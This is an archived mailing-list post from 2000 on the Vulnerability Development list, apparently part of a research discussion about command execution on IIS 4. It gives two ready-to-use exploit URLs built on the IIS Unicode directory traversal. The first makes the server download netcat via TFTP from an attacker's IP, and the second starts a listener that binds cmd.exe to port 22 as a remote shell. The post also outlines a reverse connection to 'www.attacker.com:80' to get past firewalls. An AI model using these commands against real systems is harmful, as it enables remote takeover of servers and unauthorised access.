Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: "Bluefish (P.Magnusson)" <11a () GMX NET>
Date: Wed, 15 Nov 2000 14:01:38 +0100
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe So after this, there is a port open (22 in this case as many admins will leave this open for SSH, but this is an NT box, which as we know rarely has SSH running on it) that I can telnet to and have a command prompt.
An more reliable attack though, would be to download and execute a client which connects to www.attacker.com:80, only port 80 won't be running a webserver but a server for the client. That way it will overcome more firewalls; only an application level firewall or a closed DMZ would cause problems, where as the attack you describe rely on some server port not being firewalled. ..:::::::::::::::::::::::::::::::::::::::::::::::::.. http://www.11a.nu || http://bluefish.11a.nu eleventh alliance development & security team http://www.eff.org/cafe
Current thread:
- Re: dos commands via iis 4 (TFTP) Loschiavo, Dave (Nov 11)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)
- Re: dos commands via iis 4 (TFTP) dsbelile (Nov 15)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 15)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Matt Zimmerman (Nov 16)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 18)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 19)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Illes Marci (Nov 21)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 22)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- <Possible follow-ups>
- Re: dos commands via iis 4 (TFTP) Loschiavo, Dave (Nov 11)